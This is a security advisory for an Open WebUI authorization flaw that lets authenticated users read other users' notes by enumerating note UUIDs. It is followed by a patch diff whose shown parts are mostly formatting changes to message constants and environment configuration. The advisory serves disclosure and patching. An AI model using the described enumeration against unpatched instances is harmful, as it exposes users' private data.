Medium severity6.5GHSA Advisory· Published May 15, 2026
CVE-2026-45666
CVE-2026-45666
Description
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, the API /api/v1/notes/{note_id} endpoint lacks proper authorization checks, allowing authenticated users to retrieve notes belonging to other users by guessing or enumerating UUIDs. This results in unauthorized disclosure of potentially sensitive or private user data. This vulnerability is fixed in 0.8.11.
Affected products
1- Range: <= 0.8.10
Patches
1220 files changed · +16939 −22473
backend/open_webui/config.py+1481 −1800 modifiedbackend/open_webui/constants.py+60 −78 modified@@ -2,125 +2,107 @@ class MESSAGES(str, Enum): - DEFAULT = lambda msg="": f"{msg if msg else ''}" - MODEL_ADDED = lambda model="": f"The model '{model}' has been added successfully." - MODEL_DELETED = ( - lambda model="": f"The model '{model}' has been deleted successfully." - ) + DEFAULT = lambda msg='': f'{msg if msg else ""}' + MODEL_ADDED = lambda model='': f"The model '{model}' has been added successfully." + MODEL_DELETED = lambda model='': f"The model '{model}' has been deleted successfully." class WEBHOOK_MESSAGES(str, Enum): - DEFAULT = lambda msg="": f"{msg if msg else ''}" - USER_SIGNUP = lambda username="": ( - f"New user signed up: {username}" if username else "New user signed up" - ) + DEFAULT = lambda msg='': f'{msg if msg else ""}' + USER_SIGNUP = lambda username='': (f'New user signed up: {username}' if username else 'New user signed up') class ERROR_MESSAGES(str, Enum): def __str__(self) -> str: return super().__str__() - DEFAULT = ( - lambda err="": f'{"Something went wrong :/" if err == "" else "[ERROR: " + str(err) + "]"}' - ) - ENV_VAR_NOT_FOUND = "Required environment variable not found. Terminating now." - CREATE_USER_ERROR = "Oops! Something went wrong while creating your account. Please try again later. If the issue persists, contact support for assistance." - DELETE_USER_ERROR = "Oops! Something went wrong. We encountered an issue while trying to delete the user. Please give it another shot." - EMAIL_MISMATCH = "Uh-oh! This email does not match the email your provider is registered with. Please check your email and try again." - EMAIL_TAKEN = "Uh-oh! This email is already registered. Sign in with your existing account or choose another email to start anew." - USERNAME_TAKEN = ( - "Uh-oh! This username is already registered. Please choose another username." + DEFAULT = lambda err='': f'{"Something went wrong :/" if err == "" else "[ERROR: " + str(err) + "]"}' + ENV_VAR_NOT_FOUND = 'Required environment variable not found. Terminating now.' + CREATE_USER_ERROR = 'Oops! Something went wrong while creating your account. Please try again later. If the issue persists, contact support for assistance.' + DELETE_USER_ERROR = 'Oops! Something went wrong. We encountered an issue while trying to delete the user. Please give it another shot.' + EMAIL_MISMATCH = 'Uh-oh! This email does not match the email your provider is registered with. Please check your email and try again.' + EMAIL_TAKEN = 'Uh-oh! This email is already registered. Sign in with your existing account or choose another email to start anew.' + USERNAME_TAKEN = 'Uh-oh! This username is already registered. Please choose another username.' + PASSWORD_TOO_LONG = ( + 'Uh-oh! The password you entered is too long. Please make sure your password is less than 72 bytes long.' ) - PASSWORD_TOO_LONG = "Uh-oh! The password you entered is too long. Please make sure your password is less than 72 bytes long." - COMMAND_TAKEN = "Uh-oh! This command is already registered. Please choose another command string." - FILE_EXISTS = "Uh-oh! This file is already registered. Please choose another file." + COMMAND_TAKEN = 'Uh-oh! This command is already registered. Please choose another command string.' + FILE_EXISTS = 'Uh-oh! This file is already registered. Please choose another file.' - ID_TAKEN = "Uh-oh! This id is already registered. Please choose another id string." - MODEL_ID_TAKEN = "Uh-oh! This model id is already registered. Please choose another model id string." - NAME_TAG_TAKEN = "Uh-oh! This name tag is already registered. Please choose another name tag string." - MODEL_ID_TOO_LONG = "The model id is too long. Please make sure your model id is less than 256 characters long." + ID_TAKEN = 'Uh-oh! This id is already registered. Please choose another id string.' + MODEL_ID_TAKEN = 'Uh-oh! This model id is already registered. Please choose another model id string.' + NAME_TAG_TAKEN = 'Uh-oh! This name tag is already registered. Please choose another name tag string.' + MODEL_ID_TOO_LONG = 'The model id is too long. Please make sure your model id is less than 256 characters long.' - INVALID_TOKEN = ( - "Your session has expired or the token is invalid. Please sign in again." - ) - INVALID_CRED = "The email or password provided is incorrect. Please check for typos and try logging in again." + INVALID_TOKEN = 'Your session has expired or the token is invalid. Please sign in again.' + INVALID_CRED = 'The email or password provided is incorrect. Please check for typos and try logging in again.' INVALID_EMAIL_FORMAT = "The email format you entered is invalid. Please double-check and make sure you're using a valid email address (e.g., yourname@example.com)." - INCORRECT_PASSWORD = ( - "The password provided is incorrect. Please check for typos and try again." + INCORRECT_PASSWORD = 'The password provided is incorrect. Please check for typos and try again.' + INVALID_TRUSTED_HEADER = ( + 'Your provider has not provided a trusted header. Please contact your administrator for assistance.' ) - INVALID_TRUSTED_HEADER = "Your provider has not provided a trusted header. Please contact your administrator for assistance." EXISTING_USERS = "You can't turn off authentication because there are existing users. If you want to disable WEBUI_AUTH, make sure your web interface doesn't have any existing users and is a fresh installation." - UNAUTHORIZED = "401 Unauthorized" - ACCESS_PROHIBITED = "You do not have permission to access this resource. Please contact your administrator for assistance." - ACTION_PROHIBITED = ( - "The requested action has been restricted as a security measure." + UNAUTHORIZED = '401 Unauthorized' + ACCESS_PROHIBITED = ( + 'You do not have permission to access this resource. Please contact your administrator for assistance.' ) + ACTION_PROHIBITED = 'The requested action has been restricted as a security measure.' - FILE_NOT_SENT = "FILE_NOT_SENT" + FILE_NOT_SENT = 'FILE_NOT_SENT' FILE_NOT_SUPPORTED = "Oops! It seems like the file format you're trying to upload is not supported. Please upload a file with a supported format and try again." NOT_FOUND = "We could not find what you're looking for :/" USER_NOT_FOUND = "We could not find what you're looking for :/" API_KEY_NOT_FOUND = "Oops! It looks like there's a hiccup. The API key is missing. Please make sure to provide a valid API key to access this feature." - API_KEY_NOT_ALLOWED = "Use of API key is not enabled in the environment." + API_KEY_NOT_ALLOWED = 'Use of API key is not enabled in the environment.' - MALICIOUS = "Unusual activities detected, please try again in a few minutes." + MALICIOUS = 'Unusual activities detected, please try again in a few minutes.' - PANDOC_NOT_INSTALLED = "Pandoc is not installed on the server. Please contact your administrator for assistance." - INCORRECT_FORMAT = ( - lambda err="": f"Invalid format. Please use the correct format{err}" - ) - RATE_LIMIT_EXCEEDED = "API rate limit exceeded" + PANDOC_NOT_INSTALLED = 'Pandoc is not installed on the server. Please contact your administrator for assistance.' + INCORRECT_FORMAT = lambda err='': f'Invalid format. Please use the correct format{err}' + RATE_LIMIT_EXCEEDED = 'API rate limit exceeded' - MODEL_NOT_FOUND = lambda name="": f"Model '{name}' was not found" - OPENAI_NOT_FOUND = lambda name="": "OpenAI API was not found" - OLLAMA_NOT_FOUND = "WebUI could not connect to Ollama" - CREATE_API_KEY_ERROR = "Oops! Something went wrong while creating your API key. Please try again later. If the issue persists, contact support for assistance." - API_KEY_CREATION_NOT_ALLOWED = "API key creation is not allowed in the environment." + MODEL_NOT_FOUND = lambda name='': f"Model '{name}' was not found" + OPENAI_NOT_FOUND = lambda name='': 'OpenAI API was not found' + OLLAMA_NOT_FOUND = 'WebUI could not connect to Ollama' + CREATE_API_KEY_ERROR = 'Oops! Something went wrong while creating your API key. Please try again later. If the issue persists, contact support for assistance.' + API_KEY_CREATION_NOT_ALLOWED = 'API key creation is not allowed in the environment.' - EMPTY_CONTENT = "The content provided is empty. Please ensure that there is text or data present before proceeding." + EMPTY_CONTENT = 'The content provided is empty. Please ensure that there is text or data present before proceeding.' - DB_NOT_SQLITE = "This feature is only available when running with SQLite databases." + DB_NOT_SQLITE = 'This feature is only available when running with SQLite databases.' - INVALID_URL = ( - "Oops! The URL you provided is invalid. Please double-check and try again." - ) + INVALID_URL = 'Oops! The URL you provided is invalid. Please double-check and try again.' - WEB_SEARCH_ERROR = ( - lambda err="": f"{err if err else 'Oops! Something went wrong while searching the web.'}" - ) + WEB_SEARCH_ERROR = lambda err='': f'{err if err else "Oops! Something went wrong while searching the web."}' - OLLAMA_API_DISABLED = ( - "The Ollama API is disabled. Please enable it to use this feature." - ) + OLLAMA_API_DISABLED = 'The Ollama API is disabled. Please enable it to use this feature.' FILE_TOO_LARGE = ( - lambda size="": f"Oops! The file you're trying to upload is too large. Please upload a file that is less than {size}." + lambda size='': f"Oops! The file you're trying to upload is too large. Please upload a file that is less than {size}." ) - DUPLICATE_CONTENT = ( - "Duplicate content detected. Please provide unique content to proceed." + DUPLICATE_CONTENT = 'Duplicate content detected. Please provide unique content to proceed.' + FILE_NOT_PROCESSED = ( + 'Extracted content is not available for this file. Please ensure that the file is processed before proceeding.' ) - FILE_NOT_PROCESSED = "Extracted content is not available for this file. Please ensure that the file is processed before proceeding." - INVALID_PASSWORD = lambda err="": ( - err if err else "The password does not meet the required validation criteria." - ) + INVALID_PASSWORD = lambda err='': (err if err else 'The password does not meet the required validation criteria.') class TASKS(str, Enum): def __str__(self) -> str: return super().__str__() - DEFAULT = lambda task="": f"{task if task else 'generation'}" - TITLE_GENERATION = "title_generation" - FOLLOW_UP_GENERATION = "follow_up_generation" - TAGS_GENERATION = "tags_generation" - EMOJI_GENERATION = "emoji_generation" - QUERY_GENERATION = "query_generation" - IMAGE_PROMPT_GENERATION = "image_prompt_generation" - AUTOCOMPLETE_GENERATION = "autocomplete_generation" - FUNCTION_CALLING = "function_calling" - MOA_RESPONSE_GENERATION = "moa_response_generation" + DEFAULT = lambda task='': f'{task if task else "generation"}' + TITLE_GENERATION = 'title_generation' + FOLLOW_UP_GENERATION = 'follow_up_generation' + TAGS_GENERATION = 'tags_generation' + EMOJI_GENERATION = 'emoji_generation' + QUERY_GENERATION = 'query_generation' + IMAGE_PROMPT_GENERATION = 'image_prompt_generation' + AUTOCOMPLETE_GENERATION = 'autocomplete_generation' + FUNCTION_CALLING = 'function_calling' + MOA_RESPONSE_GENERATION = 'moa_response_generation'
backend/open_webui/env.py+279 −428 modified@@ -37,37 +37,34 @@ try: from dotenv import find_dotenv, load_dotenv - load_dotenv(find_dotenv(str(BASE_DIR / ".env"))) + load_dotenv(find_dotenv(str(BASE_DIR / '.env'))) except ImportError: - print("dotenv not installed, skipping...") + print('dotenv not installed, skipping...') -DOCKER = os.environ.get("DOCKER", "False").lower() == "true" +DOCKER = os.environ.get('DOCKER', 'False').lower() == 'true' # device type embedding models - "cpu" (default), "cuda" (nvidia gpu required) or "mps" (apple silicon) - choosing this right can lead to better performance -USE_CUDA = os.environ.get("USE_CUDA_DOCKER", "false") +USE_CUDA = os.environ.get('USE_CUDA_DOCKER', 'false') -if USE_CUDA.lower() == "true": +if USE_CUDA.lower() == 'true': try: import torch - assert torch.cuda.is_available(), "CUDA not available" - DEVICE_TYPE = "cuda" + assert torch.cuda.is_available(), 'CUDA not available' + DEVICE_TYPE = 'cuda' except Exception as e: - cuda_error = ( - "Error when testing CUDA but USE_CUDA_DOCKER is true. " - f"Resetting USE_CUDA_DOCKER to false: {e}" - ) - os.environ["USE_CUDA_DOCKER"] = "false" - USE_CUDA = "false" - DEVICE_TYPE = "cpu" + cuda_error = f'Error when testing CUDA but USE_CUDA_DOCKER is true. Resetting USE_CUDA_DOCKER to false: {e}' + os.environ['USE_CUDA_DOCKER'] = 'false' + USE_CUDA = 'false' + DEVICE_TYPE = 'cpu' else: - DEVICE_TYPE = "cpu" + DEVICE_TYPE = 'cpu' try: import torch if torch.backends.mps.is_available() and torch.backends.mps.is_built(): - DEVICE_TYPE = "mps" + DEVICE_TYPE = 'mps' except Exception: pass @@ -76,11 +73,11 @@ #################################### _LEVEL_MAP = { - "DEBUG": "debug", - "INFO": "info", - "WARNING": "warn", - "ERROR": "error", - "CRITICAL": "fatal", + 'DEBUG': 'debug', + 'INFO': 'info', + 'WARNING': 'warn', + 'ERROR': 'error', + 'CRITICAL': 'fatal', } @@ -89,132 +86,128 @@ class JSONFormatter(logging.Formatter): def format(self, record: logging.LogRecord) -> str: log_entry: dict[str, Any] = { - "ts": datetime.fromtimestamp(record.created, tz=timezone.utc).isoformat( - timespec="milliseconds" - ), - "level": _LEVEL_MAP.get(record.levelname, record.levelname.lower()), - "msg": record.getMessage(), - "caller": record.name, + 'ts': datetime.fromtimestamp(record.created, tz=timezone.utc).isoformat(timespec='milliseconds'), + 'level': _LEVEL_MAP.get(record.levelname, record.levelname.lower()), + 'msg': record.getMessage(), + 'caller': record.name, } if record.exc_info and record.exc_info[0] is not None: - log_entry["error"] = "".join( - traceback.format_exception(*record.exc_info) - ).rstrip() + log_entry['error'] = ''.join(traceback.format_exception(*record.exc_info)).rstrip() elif record.exc_text: - log_entry["error"] = record.exc_text + log_entry['error'] = record.exc_text if record.stack_info: - log_entry["stacktrace"] = record.stack_info + log_entry['stacktrace'] = record.stack_info return json.dumps(log_entry, ensure_ascii=False, default=str) -LOG_FORMAT = os.environ.get("LOG_FORMAT", "").lower() +LOG_FORMAT = os.environ.get('LOG_FORMAT', '').lower() -GLOBAL_LOG_LEVEL = os.environ.get("GLOBAL_LOG_LEVEL", "").upper() +GLOBAL_LOG_LEVEL = os.environ.get('GLOBAL_LOG_LEVEL', '').upper() if GLOBAL_LOG_LEVEL in logging.getLevelNamesMapping(): - if LOG_FORMAT == "json": + if LOG_FORMAT == 'json': _handler = logging.StreamHandler(sys.stdout) _handler.setFormatter(JSONFormatter()) logging.basicConfig(handlers=[_handler], level=GLOBAL_LOG_LEVEL, force=True) else: logging.basicConfig(stream=sys.stdout, level=GLOBAL_LOG_LEVEL, force=True) else: - GLOBAL_LOG_LEVEL = "INFO" + GLOBAL_LOG_LEVEL = 'INFO' log = logging.getLogger(__name__) -log.info(f"GLOBAL_LOG_LEVEL: {GLOBAL_LOG_LEVEL}") +log.info(f'GLOBAL_LOG_LEVEL: {GLOBAL_LOG_LEVEL}') -if "cuda_error" in locals(): +if 'cuda_error' in locals(): log.exception(cuda_error) del cuda_error SRC_LOG_LEVELS = {} # Legacy variable, do not remove -WEBUI_NAME = os.environ.get("WEBUI_NAME", "Open WebUI") -if WEBUI_NAME != "Open WebUI": - WEBUI_NAME += " (Open WebUI)" +WEBUI_NAME = os.environ.get('WEBUI_NAME', 'Open WebUI') +if WEBUI_NAME != 'Open WebUI': + WEBUI_NAME += ' (Open WebUI)' -WEBUI_FAVICON_URL = "https://openwebui.com/favicon.png" +WEBUI_FAVICON_URL = 'https://openwebui.com/favicon.png' -TRUSTED_SIGNATURE_KEY = os.environ.get("TRUSTED_SIGNATURE_KEY", "") +TRUSTED_SIGNATURE_KEY = os.environ.get('TRUSTED_SIGNATURE_KEY', '') #################################### # ENV (dev,test,prod) #################################### -ENV = os.environ.get("ENV", "dev") +ENV = os.environ.get('ENV', 'dev') -FROM_INIT_PY = os.environ.get("FROM_INIT_PY", "False").lower() == "true" +FROM_INIT_PY = os.environ.get('FROM_INIT_PY', 'False').lower() == 'true' if FROM_INIT_PY: - PACKAGE_DATA = {"version": importlib.metadata.version("open-webui")} + PACKAGE_DATA = {'version': importlib.metadata.version('open-webui')} else: try: - PACKAGE_DATA = json.loads((BASE_DIR / "package.json").read_text()) + PACKAGE_DATA = json.loads((BASE_DIR / 'package.json').read_text()) except Exception: - PACKAGE_DATA = {"version": "0.0.0"} + PACKAGE_DATA = {'version': '0.0.0'} -VERSION = PACKAGE_DATA["version"] +VERSION = PACKAGE_DATA['version'] -DEPLOYMENT_ID = os.environ.get("DEPLOYMENT_ID", "") -INSTANCE_ID = os.environ.get("INSTANCE_ID", str(uuid4())) +DEPLOYMENT_ID = os.environ.get('DEPLOYMENT_ID', '') +INSTANCE_ID = os.environ.get('INSTANCE_ID', str(uuid4())) -ENABLE_DB_MIGRATIONS = os.environ.get("ENABLE_DB_MIGRATIONS", "True").lower() == "true" +ENABLE_DB_MIGRATIONS = os.environ.get('ENABLE_DB_MIGRATIONS', 'True').lower() == 'true' # Function to parse each section def parse_section(section): items = [] - for li in section.find_all("li"): + for li in section.find_all('li'): # Extract raw HTML string raw_html = str(li) # Extract text without HTML tags - text = li.get_text(separator=" ", strip=True) + text = li.get_text(separator=' ', strip=True) # Split into title and content - parts = text.split(": ", 1) - title = parts[0].strip() if len(parts) > 1 else "" + parts = text.split(': ', 1) + title = parts[0].strip() if len(parts) > 1 else '' content = parts[1].strip() if len(parts) > 1 else text - items.append({"title": title, "content": content, "raw": raw_html}) + items.append({'title': title, 'content': content, 'raw': raw_html}) return items try: - changelog_path = BASE_DIR / "CHANGELOG.md" - with open(str(changelog_path.absolute()), "r", encoding="utf8") as file: + changelog_path = BASE_DIR / 'CHANGELOG.md' + with open(str(changelog_path.absolute()), 'r', encoding='utf8') as file: changelog_content = file.read() except Exception: - changelog_content = (pkgutil.get_data("open_webui", "CHANGELOG.md") or b"").decode() + changelog_content = (pkgutil.get_data('open_webui', 'CHANGELOG.md') or b'').decode() # Convert markdown content to HTML html_content = markdown.markdown(changelog_content) # Parse the HTML content -soup = BeautifulSoup(html_content, "html.parser") +soup = BeautifulSoup(html_content, 'html.parser') # Initialize JSON structure changelog_json = {} # Iterate over each version -for version in soup.find_all("h2"): - version_number = version.get_text().strip().split(" - ")[0][1:-1] # Remove brackets - date = version.get_text().strip().split(" - ")[1] +for version in soup.find_all('h2'): + version_number = version.get_text().strip().split(' - ')[0][1:-1] # Remove brackets + date = version.get_text().strip().split(' - ')[1] - version_data = {"date": date} + version_data = {'date': date} # Find the next sibling that is a h3 tag (section title) current = version.find_next_sibling() - while current and current.name != "h2": - if current.name == "h3": + while current and current.name != 'h2': + if current.name == 'h3': section_title = current.get_text().lower() # e.g., "added", "fixed" - section_items = parse_section(current.find_next_sibling("ul")) + section_items = parse_section(current.find_next_sibling('ul')) version_data[section_title] = section_items # Move to the next element @@ -228,65 +221,51 @@ def parse_section(section): # SAFE_MODE #################################### -SAFE_MODE = os.environ.get("SAFE_MODE", "false").lower() == "true" +SAFE_MODE = os.environ.get('SAFE_MODE', 'false').lower() == 'true' #################################### # ENABLE_FORWARD_USER_INFO_HEADERS #################################### -ENABLE_FORWARD_USER_INFO_HEADERS = ( - os.environ.get("ENABLE_FORWARD_USER_INFO_HEADERS", "False").lower() == "true" -) +ENABLE_FORWARD_USER_INFO_HEADERS = os.environ.get('ENABLE_FORWARD_USER_INFO_HEADERS', 'False').lower() == 'true' # Header names for user info forwarding (customizable via environment variables) -FORWARD_USER_INFO_HEADER_USER_NAME = os.environ.get( - "FORWARD_USER_INFO_HEADER_USER_NAME", "X-OpenWebUI-User-Name" -) -FORWARD_USER_INFO_HEADER_USER_ID = os.environ.get( - "FORWARD_USER_INFO_HEADER_USER_ID", "X-OpenWebUI-User-Id" -) -FORWARD_USER_INFO_HEADER_USER_EMAIL = os.environ.get( - "FORWARD_USER_INFO_HEADER_USER_EMAIL", "X-OpenWebUI-User-Email" -) -FORWARD_USER_INFO_HEADER_USER_ROLE = os.environ.get( - "FORWARD_USER_INFO_HEADER_USER_ROLE", "X-OpenWebUI-User-Role" -) +FORWARD_USER_INFO_HEADER_USER_NAME = os.environ.get('FORWARD_USER_INFO_HEADER_USER_NAME', 'X-OpenWebUI-User-Name') +FORWARD_USER_INFO_HEADER_USER_ID = os.environ.get('FORWARD_USER_INFO_HEADER_USER_ID', 'X-OpenWebUI-User-Id') +FORWARD_USER_INFO_HEADER_USER_EMAIL = os.environ.get('FORWARD_USER_INFO_HEADER_USER_EMAIL', 'X-OpenWebUI-User-Email') +FORWARD_USER_INFO_HEADER_USER_ROLE = os.environ.get('FORWARD_USER_INFO_HEADER_USER_ROLE', 'X-OpenWebUI-User-Role') # Header name for chat ID forwarding (customizable via environment variable) FORWARD_SESSION_INFO_HEADER_MESSAGE_ID = os.environ.get( - "FORWARD_SESSION_INFO_HEADER_MESSAGE_ID", "X-OpenWebUI-Message-Id" -) -FORWARD_SESSION_INFO_HEADER_CHAT_ID = os.environ.get( - "FORWARD_SESSION_INFO_HEADER_CHAT_ID", "X-OpenWebUI-Chat-Id" + 'FORWARD_SESSION_INFO_HEADER_MESSAGE_ID', 'X-OpenWebUI-Message-Id' ) +FORWARD_SESSION_INFO_HEADER_CHAT_ID = os.environ.get('FORWARD_SESSION_INFO_HEADER_CHAT_ID', 'X-OpenWebUI-Chat-Id') # Experimental feature, may be removed in future -ENABLE_STAR_SESSIONS_MIDDLEWARE = ( - os.environ.get("ENABLE_STAR_SESSIONS_MIDDLEWARE", "False").lower() == "true" -) +ENABLE_STAR_SESSIONS_MIDDLEWARE = os.environ.get('ENABLE_STAR_SESSIONS_MIDDLEWARE', 'False').lower() == 'true' -ENABLE_EASTER_EGGS = os.environ.get("ENABLE_EASTER_EGGS", "True").lower() == "true" +ENABLE_EASTER_EGGS = os.environ.get('ENABLE_EASTER_EGGS', 'True').lower() == 'true' #################################### # WEBUI_BUILD_HASH #################################### -WEBUI_BUILD_HASH = os.environ.get("WEBUI_BUILD_HASH", "dev-build") +WEBUI_BUILD_HASH = os.environ.get('WEBUI_BUILD_HASH', 'dev-build') #################################### # DATA/FRONTEND BUILD DIR #################################### -DATA_DIR = Path(os.getenv("DATA_DIR", BACKEND_DIR / "data")).resolve() +DATA_DIR = Path(os.getenv('DATA_DIR', BACKEND_DIR / 'data')).resolve() if FROM_INIT_PY: - NEW_DATA_DIR = Path(os.getenv("DATA_DIR", OPEN_WEBUI_DIR / "data")).resolve() + NEW_DATA_DIR = Path(os.getenv('DATA_DIR', OPEN_WEBUI_DIR / 'data')).resolve() NEW_DATA_DIR.mkdir(parents=True, exist_ok=True) # Check if the data directory exists in the package directory if DATA_DIR.exists() and DATA_DIR != NEW_DATA_DIR: - log.info(f"Moving {DATA_DIR} to {NEW_DATA_DIR}") + log.info(f'Moving {DATA_DIR} to {NEW_DATA_DIR}') for item in DATA_DIR.iterdir(): dest = NEW_DATA_DIR / item.name if item.is_dir(): @@ -295,157 +274,143 @@ def parse_section(section): shutil.copy2(item, dest) # Zip the data directory - shutil.make_archive(DATA_DIR.parent / "open_webui_data", "zip", DATA_DIR) + shutil.make_archive(DATA_DIR.parent / 'open_webui_data', 'zip', DATA_DIR) # Remove the old data directory shutil.rmtree(DATA_DIR) - DATA_DIR = Path(os.getenv("DATA_DIR", OPEN_WEBUI_DIR / "data")) + DATA_DIR = Path(os.getenv('DATA_DIR', OPEN_WEBUI_DIR / 'data')) -STATIC_DIR = Path(os.getenv("STATIC_DIR", OPEN_WEBUI_DIR / "static")) +STATIC_DIR = Path(os.getenv('STATIC_DIR', OPEN_WEBUI_DIR / 'static')) -FONTS_DIR = Path(os.getenv("FONTS_DIR", OPEN_WEBUI_DIR / "static" / "fonts")) +FONTS_DIR = Path(os.getenv('FONTS_DIR', OPEN_WEBUI_DIR / 'static' / 'fonts')) -FRONTEND_BUILD_DIR = Path(os.getenv("FRONTEND_BUILD_DIR", BASE_DIR / "build")).resolve() +FRONTEND_BUILD_DIR = Path(os.getenv('FRONTEND_BUILD_DIR', BASE_DIR / 'build')).resolve() if FROM_INIT_PY: - FRONTEND_BUILD_DIR = Path( - os.getenv("FRONTEND_BUILD_DIR", OPEN_WEBUI_DIR / "frontend") - ).resolve() + FRONTEND_BUILD_DIR = Path(os.getenv('FRONTEND_BUILD_DIR', OPEN_WEBUI_DIR / 'frontend')).resolve() #################################### # Database #################################### # Check if the file exists -if os.path.exists(f"{DATA_DIR}/ollama.db"): +if os.path.exists(f'{DATA_DIR}/ollama.db'): # Rename the file - os.rename(f"{DATA_DIR}/ollama.db", f"{DATA_DIR}/webui.db") - log.info("Database migrated from Ollama-WebUI successfully.") + os.rename(f'{DATA_DIR}/ollama.db', f'{DATA_DIR}/webui.db') + log.info('Database migrated from Ollama-WebUI successfully.') else: pass -DATABASE_URL = os.environ.get("DATABASE_URL", f"sqlite:///{DATA_DIR}/webui.db") +DATABASE_URL = os.environ.get('DATABASE_URL', f'sqlite:///{DATA_DIR}/webui.db') -DATABASE_TYPE = os.environ.get("DATABASE_TYPE") -DATABASE_USER = os.environ.get("DATABASE_USER") -DATABASE_PASSWORD = os.environ.get("DATABASE_PASSWORD") +DATABASE_TYPE = os.environ.get('DATABASE_TYPE') +DATABASE_USER = os.environ.get('DATABASE_USER') +DATABASE_PASSWORD = os.environ.get('DATABASE_PASSWORD') -DATABASE_CRED = "" +DATABASE_CRED = '' if DATABASE_USER: - DATABASE_CRED += f"{DATABASE_USER}" + DATABASE_CRED += f'{DATABASE_USER}' if DATABASE_PASSWORD: - DATABASE_CRED += f":{DATABASE_PASSWORD}" + DATABASE_CRED += f':{DATABASE_PASSWORD}' DB_VARS = { - "db_type": DATABASE_TYPE, - "db_cred": DATABASE_CRED, - "db_host": os.environ.get("DATABASE_HOST"), - "db_port": os.environ.get("DATABASE_PORT"), - "db_name": os.environ.get("DATABASE_NAME"), + 'db_type': DATABASE_TYPE, + 'db_cred': DATABASE_CRED, + 'db_host': os.environ.get('DATABASE_HOST'), + 'db_port': os.environ.get('DATABASE_PORT'), + 'db_name': os.environ.get('DATABASE_NAME'), } if all(DB_VARS.values()): - DATABASE_URL = f"{DB_VARS['db_type']}://{DB_VARS['db_cred']}@{DB_VARS['db_host']}:{DB_VARS['db_port']}/{DB_VARS['db_name']}" -elif DATABASE_TYPE == "sqlite+sqlcipher" and not os.environ.get("DATABASE_URL"): + DATABASE_URL = ( + f'{DB_VARS["db_type"]}://{DB_VARS["db_cred"]}@{DB_VARS["db_host"]}:{DB_VARS["db_port"]}/{DB_VARS["db_name"]}' + ) +elif DATABASE_TYPE == 'sqlite+sqlcipher' and not os.environ.get('DATABASE_URL'): # Handle SQLCipher with local file when DATABASE_URL wasn't explicitly set - DATABASE_URL = f"sqlite+sqlcipher:///{DATA_DIR}/webui.db" + DATABASE_URL = f'sqlite+sqlcipher:///{DATA_DIR}/webui.db' # Replace the postgres:// with postgresql:// -if "postgres://" in DATABASE_URL: - DATABASE_URL = DATABASE_URL.replace("postgres://", "postgresql://") +if 'postgres://' in DATABASE_URL: + DATABASE_URL = DATABASE_URL.replace('postgres://', 'postgresql://') -DATABASE_SCHEMA = os.environ.get("DATABASE_SCHEMA", None) +DATABASE_SCHEMA = os.environ.get('DATABASE_SCHEMA', None) -DATABASE_POOL_SIZE = os.environ.get("DATABASE_POOL_SIZE", None) +DATABASE_POOL_SIZE = os.environ.get('DATABASE_POOL_SIZE', None) if DATABASE_POOL_SIZE != None: try: DATABASE_POOL_SIZE = int(DATABASE_POOL_SIZE) except Exception: DATABASE_POOL_SIZE = None -DATABASE_POOL_MAX_OVERFLOW = os.environ.get("DATABASE_POOL_MAX_OVERFLOW", 0) +DATABASE_POOL_MAX_OVERFLOW = os.environ.get('DATABASE_POOL_MAX_OVERFLOW', 0) -if DATABASE_POOL_MAX_OVERFLOW == "": +if DATABASE_POOL_MAX_OVERFLOW == '': DATABASE_POOL_MAX_OVERFLOW = 0 else: try: DATABASE_POOL_MAX_OVERFLOW = int(DATABASE_POOL_MAX_OVERFLOW) except Exception: DATABASE_POOL_MAX_OVERFLOW = 0 -DATABASE_POOL_TIMEOUT = os.environ.get("DATABASE_POOL_TIMEOUT", 30) +DATABASE_POOL_TIMEOUT = os.environ.get('DATABASE_POOL_TIMEOUT', 30) -if DATABASE_POOL_TIMEOUT == "": +if DATABASE_POOL_TIMEOUT == '': DATABASE_POOL_TIMEOUT = 30 else: try: DATABASE_POOL_TIMEOUT = int(DATABASE_POOL_TIMEOUT) except Exception: DATABASE_POOL_TIMEOUT = 30 -DATABASE_POOL_RECYCLE = os.environ.get("DATABASE_POOL_RECYCLE", 3600) +DATABASE_POOL_RECYCLE = os.environ.get('DATABASE_POOL_RECYCLE', 3600) -if DATABASE_POOL_RECYCLE == "": +if DATABASE_POOL_RECYCLE == '': DATABASE_POOL_RECYCLE = 3600 else: try: DATABASE_POOL_RECYCLE = int(DATABASE_POOL_RECYCLE) except Exception: DATABASE_POOL_RECYCLE = 3600 -DATABASE_ENABLE_SQLITE_WAL = ( - os.environ.get("DATABASE_ENABLE_SQLITE_WAL", "False").lower() == "true" -) +DATABASE_ENABLE_SQLITE_WAL = os.environ.get('DATABASE_ENABLE_SQLITE_WAL', 'False').lower() == 'true' -DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL = os.environ.get( - "DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL", None -) +DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL = os.environ.get('DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL', None) if DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL is not None: try: - DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL = float( - DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL - ) + DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL = float(DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL) except Exception: DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL = 0.0 # When enabled, get_db_context reuses existing sessions; set to False to always create new sessions -DATABASE_ENABLE_SESSION_SHARING = ( - os.environ.get("DATABASE_ENABLE_SESSION_SHARING", "False").lower() == "true" -) +DATABASE_ENABLE_SESSION_SHARING = os.environ.get('DATABASE_ENABLE_SESSION_SHARING', 'False').lower() == 'true' # Enable public visibility of active user count (when disabled, only admins can see it) -ENABLE_PUBLIC_ACTIVE_USERS_COUNT = ( - os.environ.get("ENABLE_PUBLIC_ACTIVE_USERS_COUNT", "True").lower() == "true" -) +ENABLE_PUBLIC_ACTIVE_USERS_COUNT = os.environ.get('ENABLE_PUBLIC_ACTIVE_USERS_COUNT', 'True').lower() == 'true' -RESET_CONFIG_ON_START = ( - os.environ.get("RESET_CONFIG_ON_START", "False").lower() == "true" -) +RESET_CONFIG_ON_START = os.environ.get('RESET_CONFIG_ON_START', 'False').lower() == 'true' -ENABLE_REALTIME_CHAT_SAVE = ( - os.environ.get("ENABLE_REALTIME_CHAT_SAVE", "False").lower() == "true" -) +ENABLE_REALTIME_CHAT_SAVE = os.environ.get('ENABLE_REALTIME_CHAT_SAVE', 'False').lower() == 'true' 